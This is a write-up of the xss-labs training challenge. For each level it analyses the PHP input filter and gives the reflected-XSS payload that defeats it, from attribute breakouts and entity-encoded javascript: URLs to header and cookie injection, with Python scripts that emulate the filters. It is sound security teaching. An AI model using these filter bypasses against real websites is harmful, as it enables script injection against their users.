XSS Challenge Tour
level 1
The keyword is reflected into the page without any filtering.
payload:
<script>alert(1)</script>
level 2
php key code:
echo "<h2 align=center>No results related to ".htmlspecialchars($str)." were found.</h2>".'<center>
<input name=keyword value="'.$str.'">
Analysis:
$str is attacker-controlled. In the first line it passes through htmlspecialchars(), so it is entity-encoded and useless to us.
In the second line it is inserted into the value attribute unfiltered, so just close the attribute and the input tag with "> and append a script tag.
payload:
"><script>alert(1)</script>&submit=search
level 3
Key Code:
<input name=keyword value='".htmlspecialchars($str)."'>
Analysis:
The output is entity-encoded, so no new tag can be opened, but a JavaScript event attribute can still trigger XSS. htmlspecialchars() with its default flags (ENT_COMPAT, the default before PHP 8.1) encodes double quotes but leaves single quotes alone, and this attribute is single-quoted, so a single quote closes it. The > in the payload below becomes &gt; and ends up as a harmless bare attribute name.
payload:
'> onmouseover=alert(1) b='&submit=search
level 4
Key Code:
$str = $_GET["keyword"];
$str2=str_replace(">","",$str);
$str3=str_replace("<","",$str2);
<input name=keyword value="'.$str3.'">
Analysis:
The keyword is read and both angle brackets are removed, so no tag can be opened. The attribute is double-quoted and double quotes are left untouched, so close it with a double quote and add a JS event attribute.
payload:
aa" onmouseover=alert(1) b="
level 5
Key Code:
$str = strtolower($_GET["keyword"]);
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
<input name=keyword value="'.$str3.'">
Analysis:
The keyword is first lowercased, then <script and on are broken up, so neither script tags nor event handlers survive.
Use a tag whose javascript: URL contains none of the filtered strings: an <a> with href="javascript:...". This one needs user interaction: after submitting, click the link to trigger it.
payload:
"><a href="javascript:alert(1)">
level 6
Key Code:
$str = $_GET["keyword"];
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
<input name=keyword value="'.$str6.'">
Analysis:
Same idea as level 5: <script, on, src, data and href are broken up, but there is no strtolower() and str_replace() is case-sensitive, so mixed case bypasses every rule.
payload:
"><a Href="javascript:alert(1)">
"><img Src=x Onerror=alert(1)>
level 7
Key Code:
$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);
<input name=keyword value="'.$str6.'">
Analysis:
strtolower() is applied and script, on, src, data and href are deleted (replaced with the empty string).
Because str_replace() makes a single pass, nesting a word inside itself defeats a deletion filter: scrscriptipt loses its inner script and what is left is script again.
payload:
"><scscriptript>alert(1)</scrscriptipt>
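The following is an added example, not code from the xss-labs source or from this writeup: it re-implements the str_replace() chains of levels 5, 6 and 7 in Python and checks which of the payloads above come through intact. The point it makes is that PHP's str_replace() is case-sensitive and makes one left-to-right pass per search string, which is exactly what the case-mixing and word-nesting bypasses rely on.

```python
# Added example (not from the xss-labs source): emulate the str_replace()
# chains of levels 5, 6 and 7 and check which payloads come through intact.
# PHP's str_replace() is case-sensitive and makes ONE left-to-right pass per
# search string, which is exactly what the two bypasses below rely on.

LEVEL5 = [("<script", "<scr_ipt"), ("on", "o_n")]
LEVEL6 = LEVEL5 + [("src", "sr_c"), ("data", "da_ta"), ("href", "hr_ef")]
LEVEL7 = [(w, "") for w in ("script", "on", "src", "data", "href")]


def php_filter(keyword: str, replacements, lower: bool) -> str:
    """strtolower() (when the level does it) followed by the str_replace chain."""
    s = keyword.lower() if lower else keyword
    for old, new in replacements:
        s = s.replace(old, new)  # str.replace() == single-pass str_replace()
    return s


def survives(keyword: str, replacements, lower: bool, wanted: str) -> bool:
    """Does the markup we need still appear (case-insensitively) after filtering?"""
    return wanted.lower() in php_filter(keyword, replacements, lower).lower()


def nest(word: str) -> str:
    """Level 7 bypass: split a word and put a copy of it in the gap ('scrscriptipt').
    Deleting the inner copy in a single pass reassembles the outer word."""
    half = len(word) // 2
    return word[:half] + word + word[half:]


# (level, payload, filter chain, strtolower?, markup that must survive)
CASES = [
    # level 5: strtolower() kills case mixing ...
    (5, '"><img Src=x Onerror=alert(1)>', LEVEL5, True, "onerror=alert(1)"),
    # ... but <a href="javascript:"> contains none of the filtered strings
    (5, '"><a href="javascript:alert(1)">', LEVEL5, True, 'href="javascript:alert(1)"'),
    # level 6: no strtolower(), so mixed case slips past every rule
    (6, '"><img Src=x Onerror=alert(1)>', LEVEL6, False, "onerror=alert(1)"),
    # level 7: deletion filter, beaten by nesting each filtered word in itself
    (7, f'"><{nest("script")}>alert(1)</{nest("script")}>', LEVEL7, True, "<script>alert(1)</script>"),
    (7, f'"><img {nest("src")}=x {nest("on")}error=alert(1)>', LEVEL7, True, "src=x onerror=alert(1)"),
]


def results() -> list:
    """One bool per CASES entry: True when the payload beats that level's filter."""
    return [survives(p, chain, lower, want) for _, p, chain, lower, want in CASES]


if __name__ == "__main__":
    for (level, payload, *_), ok in zip(CASES, results()):
        print(f"level {level}: {'bypass' if ok else 'blocked'}  {payload}")
```

Running it shows the mixed-case img payload blocked on level 5 but passing on level 6, and both nested payloads passing level 7; the nesting trick generalises to any filter that deletes a fixed string in a single pass.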
level 8
Key Code:
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot;',$str6);
echo '<center><BR><a href="'.$str7.'">Friendly Links</a></center>';
Analysis:
The filter is almost the same as before, plus double quotes are converted to &quot;.
As in level 5 we put a javascript: URL into the href, but here the filter matches script on its own (not just <script), so the URL has to be HTML-entity-encoded: the filter only sees &#...; sequences containing none of the blocked words, while the browser decodes the character references before resolving the href.
Encoding javascript:alert(1) as decimal character references gives the following.
payload:
&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;
Tip:
Python code for the encoding (every character as a decimal character reference):
def unicode_html(org_code):
    """Encode every character of org_code as a decimal HTML character reference."""
    return ''.join('&#{};'.format(ord(x)) for x in org_code)
Takeaways
Other writeups online say it can also be bypassed like this:
Empty characters, spaces, tabs, line breaks, comments or special functions can be used to split the filtered keyword, for example:
javas%09cript:alert()
javas%0acript:alert()
javas%0dcript:alert()
%09: tab, %0a: line feed, %0d: carriage return
But when I tried it:
Hmm, after searching around it turned out to be a httpd.conf configuration issue.
<Directory />
    Options FollowSymLinks
    AllowOverride None
    Order deny,allow
    Deny from all
</Directory>
Replace this block with:
<Directory />
    Options Indexes FollowSymLinks
    AllowOverride None
</Directory>
Hmm, that changed nothing either; maybe it is a problem with my environment. Leaving this as a placeholder to fill in later.
level 9
Key Code:
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot;',$str6);
if(false===strpos($str7,'http://'))
{
  echo '<center><BR><a href="Is your link illegal? Is there any!">Friendly Links</a></center>';
}
else
{
  echo '<center><BR><a href="'.$str7.'">Friendly Links</a></center>';
}
Analysis:
Same filters as level 8, plus the link is rejected unless the filtered value contains the literal string http://. Reuse the entity-encoded payload from level 8 and append http:// behind a JavaScript line comment, so the strpos() check passes but the browser ignores it when it runs the URL.
payload:
&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;//http://
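An added example for levels 8 and 9 (not code from xss-labs or from this writeup): it builds the entity-encoded javascript: URL, runs it against a re-implementation of the level 8/9 substring filter, and decodes it the way the browser does when it reads the href attribute. It also shows that encoding a single letter of each blocked word is already enough; the full encoding above is simply the most convenient form. Python's html.unescape() stands in for the browser's character-reference decoding, which is an assumption of this example.

```python
# Added example (not from the xss-labs source): build the entity-encoded
# javascript: URL used in levels 8 and 9 and show why it works. The filter runs
# on the raw parameter, where the URL is only "&#106;&#97;..." and contains no
# "script", "on", "href" or '"'; the browser decodes the character references
# when it reads the href attribute, so the link still resolves to javascript:.
import html

BLOCKED = ("script", "on", "src", "data", "href", '"')


def decimal_entities(s: str) -> str:
    """Every character as a decimal character reference: 'j' -> '&#106;'."""
    return "".join(f"&#{ord(c)};" for c in s)


def passes_filter(payload: str) -> bool:
    """Level 8/9 filter: strtolower(), then none of the blocked substrings may match."""
    lowered = payload.lower()
    return not any(word in lowered for word in BLOCKED)


def browser_sees(payload: str) -> str:
    """The href value after the browser's character-reference decoding
    (html.unescape() is used here as a stand-in for the browser)."""
    return html.unescape(payload)


def level8_payload() -> str:
    return decimal_entities("javascript:alert(1)")


def level9_payload() -> str:
    # level 9 additionally requires the literal substring "http://" somewhere
    # in the (filtered) value; hide it behind a JS line comment
    return decimal_entities("javascript:alert(1)") + "//http://"


def minimal_payload() -> str:
    """Encoding one letter of each blocked word is enough: 'scrip&#116;' no
    longer matches "script", and nothing else in the URL is blocked."""
    return "javascrip" + decimal_entities("t") + ":alert(1)"


if __name__ == "__main__":
    for name, p in (("level 8", level8_payload()), ("level 9", level9_payload()),
                    ("minimal", minimal_payload())):
        print(f"{name}: filter={'pass' if passes_filter(p) else 'BLOCKED'} "
              f"browser sees {browser_sees(p)!r}")
```

The defensive lesson is the mirror image: a blocklist applied to the raw bytes of an attribute value never sees what the HTML parser will hand the URL parser, so the only robust check is to decode first and then allow only http:// or https:// schemes.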
level 10
Key Code:
$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>No results related to ".htmlspecialchars($str)." were found.</h2>".'<center>
<input name="t_sort" value="'.$str33.'" type="hidden">
Analysis:
The keyword parameter is useless here: it is passed straight through htmlspecialchars() and output entity-encoded.
But the page also reads a t_sort parameter and only strips the angle brackets from it, so close the attribute and use a JS event.
The t_sort input is type="hidden", though, so it cannot be hovered over. Inject type="text" ahead of the original type attribute: browsers keep the first of duplicated attributes, so the field becomes visible.
payload:
" onmouseover=alert(1) type="text" //
Visit: /level10.php?keyword=well%20done!&t_sort=" onmouseover=alert(1) type="text" //
level 11
Key Code:
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>No results related to ".htmlspecialchars($str)." were found.</h2>".'<center>
<input name="t_sort" value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref" value="'.$str33.'" type="hidden">
Analysis:
Both keyword and t_sort are entity-encoded, so they are useless.
This level also reflects $_SERVER['HTTP_REFERER'], with only the angle brackets stripped. The browser sets that header, so how do we control it?
Intercept the request and edit it:
payload:
Burp Suite is used here to modify the request. Add a Referer header; the value attribute is double-quoted, so the breakout uses double quotes:
Referer: " onmouseover=alert(1) type="text" //
Then click Forward and hover over the now-visible text field.
level 12
Key Code:
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_USER_AGENT'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
<input name="t_ua" value="'.$str33.'" type="hidden">
Analysis:
Same as the previous level, except the reflected header is User-Agent, again with only angle brackets stripped, so again modify the request.
payload:
Change the value of User-Agent to: " onmouseover=alert(1) type="text" //
level 13
Key Code:
setcookie("user", "call me maybe?", time()+3600);
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_COOKIE["user"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
<input name="t_cook" value="'.$str33.'" type="hidden">
Analysis:
The page sets a cookie named user and reflects it with only the angle brackets stripped. Intercept the request and change the cookie:
payload:
Cookie: user=" onmouseover=alert(1) type="text" //
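Levels 2, 3, 4 and 10 to 13 are all the same bug in different places: attacker input lands inside the value attribute of an <input> tag, and only the sanitiser and the source of the input (query parameter, Referer, User-Agent, Cookie) change. The following is an added example, not code from xss-labs or from this writeup: it re-implements each level's sanitiser in Python, renders the tag, and parses the result with html.parser to see which payloads really produce an onmouseover attribute or a <script> tag, and why the level 10-13 payload carries type="text". Python's html.parser stands in for the browser's tag tokenizer, which is an assumption of this example; the first-of-duplicates rule it follows matches what browsers do.

```python
# Added example (not from the xss-labs source): levels 2-4 and 10-13 all
# reflect input into the value attribute of an <input> tag, each with a
# different sanitiser. This re-implements those sanitisers, renders the tag and
# parses it with html.parser to see which payloads really produce an
# onmouseover attribute or a <script> tag, and why the level 10-13 payload
# carries type="text": browsers keep the FIRST of duplicated attributes.
from html.parser import HTMLParser


def htmlspecialchars(s: str, ent_quotes: bool = False) -> str:
    """PHP htmlspecialchars(). The default mirrors ENT_COMPAT (PHP < 8.1): the
    single quote is left alone, which is what the level 3 payload relies on."""
    s = (s.replace("&", "&amp;").replace('"', "&quot;")
          .replace("<", "&lt;").replace(">", "&gt;"))
    return s.replace("'", "&#039;") if ent_quotes else s


def strip_angle(s: str) -> str:
    """Levels 4 and 10-13: str_replace('>','') then str_replace('<','')."""
    return s.replace(">", "").replace("<", "")


# how each level embeds the (filtered) value; 10 stands for 10-13, which only
# differ in where the value comes from (t_sort, Referer, User-Agent, Cookie)
TEMPLATES = {
    2: lambda p: f'<input name=keyword value="{p}">',
    3: lambda p: f"<input name=keyword value='{htmlspecialchars(p)}'>",
    4: lambda p: f'<input name=keyword value="{strip_angle(p)}">',
    10: lambda p: f'<input name="t_sort" value="{strip_angle(p)}" type="hidden">',
}


class FirstInput(HTMLParser):
    """Record the attribute list of the first <input> (duplicates kept, in
    source order) and whether a <script> start tag was seen."""

    def __init__(self):
        super().__init__()
        self.attrs = None
        self.script_tag = False

    def handle_starttag(self, tag, attrs):
        if tag == "input" and self.attrs is None:
            self.attrs = attrs
        if tag == "script":
            self.script_tag = True


def analyse(level: int, payload: str) -> dict:
    """What a browser-like parser makes of the rendered tag."""
    p = FirstInput()
    p.feed(TEMPLATES[level](payload))
    p.close()
    attrs = p.attrs or []
    first = lambda name: next((v for n, v in attrs if n == name), None)
    return {
        "onmouseover": first("onmouseover"),
        "type": first("type"),  # first occurrence wins, as in real browsers
        "script_tag": p.script_tag,
    }


def exploited(level: int, payload: str) -> bool:
    r = analyse(level, payload)
    return r["script_tag"] or r["onmouseover"] is not None


if __name__ == "__main__":
    for level, payload in [(2, '"><script>alert(1)</script>'),
                           (3, "' onmouseover=alert(1) b='"),
                           (3, '" onmouseover=alert(1) b="'),
                           (4, 'aa" onmouseover=alert(1) b="'),
                           (10, '" onmouseover=alert(1) type="text" //'),
                           (10, '" onmouseover=alert(1) //')]:
        print(level, exploited(level, payload), analyse(level, payload))
```

Two of the printed rows are the instructive ones: on level 3 the double-quote variant fails because the quote is encoded while the single-quote variant succeeds, and on level 10 dropping type="text" still injects onmouseover but leaves the field hidden, because the parser keeps the original type="hidden" as the first type attribute.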
level 14
Not very clear to me; there is an answer in the last reference.
level 15
Key Code:
<script src="https://cdn.staticfile.org/angular.js/1.4.6/angular.min.js"></script>
$str = $_GET["src"];
echo '<body><span class="ng-include:'.htmlspecialchars($str).'"></span></body>';
Analysis:
Going by other people's writeups, this level uses the AngularJS ng-include directive.
ng-include includes an external HTML file; the included content becomes child nodes of the element it is on.
The value of ng-include is an expression that evaluates to a file name, which is why the name is wrapped in single quotes.
By default the included file has to come from the same origin.
Visiting /level15.php?src='level1.php' includes the level 1 page into this one.
So a payload that already worked on level 1 can be reused. Because ng-include inserts the fetched HTML into the DOM rather than loading it as a document, <script> tags inside it are not executed, so use an img with an onerror handler instead.
payload:
/level15.php?src='level1.php?name=<img src=1 onerror=alert(1)>'
level 16
Key Code:
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","&nbsp;",$str);
$str3=str_replace(" ","&nbsp;",$str2);
$str4=str_replace("/","&nbsp;",$str3);
$str5=str_replace("\t","&nbsp;",$str4);
echo "<center>".$str5."</center>";
Analysis:
script, spaces, slashes and tabs are all turned into &nbsp;, but carriage return (%0D) and line feed are untouched and are valid attribute separators in HTML. Without "/" no closing tag can be written, so use a self-contained <img onerror> and separate its attributes with %0D.
payload:
<img%0Dsrc=1%0Donerror=alert(1)>
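An added example for level 16 (not code from xss-labs or from this writeup): it runs the level's filter over each ASCII whitespace character that HTML accepts between attributes and reports which of them survive, then percent-encodes the payload for the query string. Python's urllib.parse.quote() with an empty safe set is used for the URL encoding, which is an assumption of this example.

```python
# Added example (not from the xss-labs source): level 16 replaces "script",
# space, "/" and tab with &nbsp; but leaves the other ASCII whitespace alone.
# HTML allows a tag's attributes to be separated by space, tab, LF, FF or CR,
# so run the filter over each candidate separator and see which ones still
# yield a working <img onerror> tag.
from urllib.parse import quote


def level16_filter(keyword: str) -> str:
    """strtolower() followed by the four str_replace() calls of level 16."""
    s = keyword.lower()
    for old in ("script", " ", "/", "\t"):
        s = s.replace(old, "&nbsp;")
    return s


# the HTML whitespace characters a tokenizer accepts between attributes
HTML_WHITESPACE = {" ": "space", "\t": "tab", "\n": "LF", "\x0c": "FF", "\r": "CR"}


def usable_separators() -> dict:
    """Map each separator name to whether <img SEP src=1 SEP onerror=alert(1)>
    comes out of the filter unchanged, i.e. the browser will see attributes."""
    out = {}
    for ch, name in HTML_WHITESPACE.items():
        payload = f"<img{ch}src=1{ch}onerror=alert(1)>"
        out[name] = level16_filter(payload) == payload
    return out


def url_payload(sep: str) -> str:
    """Percent-encode the payload for the keyword parameter, e.g. CR -> %0D."""
    return quote(f"<img{sep}src=1{sep}onerror=alert(1)>", safe="")


if __name__ == "__main__":
    for name, ok in usable_separators().items():
        print(f"{name:5s} {'works' if ok else 'filtered'}")
    print("?keyword=" + url_payload("\r"))
```

The result is the same lesson as the other levels: a blocklist of two whitespace characters is not a blocklist of whitespace, and a parser-aware encoder (or a tag allowlist) is the only fix that does not leave a third separator behind.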
level 17
Key Code:
echo "<embed src=xsf01.swf?".htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"])." width=100% heigth=100%>";
Analysis:
Both arguments are entity-encoded, but they are placed in an unquoted attribute context inside the <embed> tag, so a space followed by an event handler attribute simply adds a new attribute; no angle brackets or quotes are needed.
payload:
arg01=a&arg02=%20onmouseover=alert(1)
Source code after execution:
<embed src=xsf01.swf?a= onmouseover=alert(1) width=100% heigth=100%><h2 align=center>After success,<a href=level18.php?arg01=a&arg02=b>Click on me to enter the next level</a></h2>
level 18
Key Code:
echo "<embed src=xsf02.swf?".htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"])." width=100% heigth=100%>";
Analysis:
Same as level 17, only the Flash file differs.
payload:
arg01=a&arg02=%20onmouseover=alert(1)
Levels 19 and 20: not solved.
References:
XSS Challenge Tour (1~10): https://www.jianshu.com/p/550529813397
XSS Challenge Tour - Game Breakout: https://www.jianshu.com/p/4e3a517bc4ea
Dwarf on Giant's Shoulders: XSS Challenge Tour - Solutions (updated to level 18): https://xz.aliyun.com/t/1206?accounttraceid=74ab404d-2a01-4a1c-8b87-36ad367dbe11#toc-12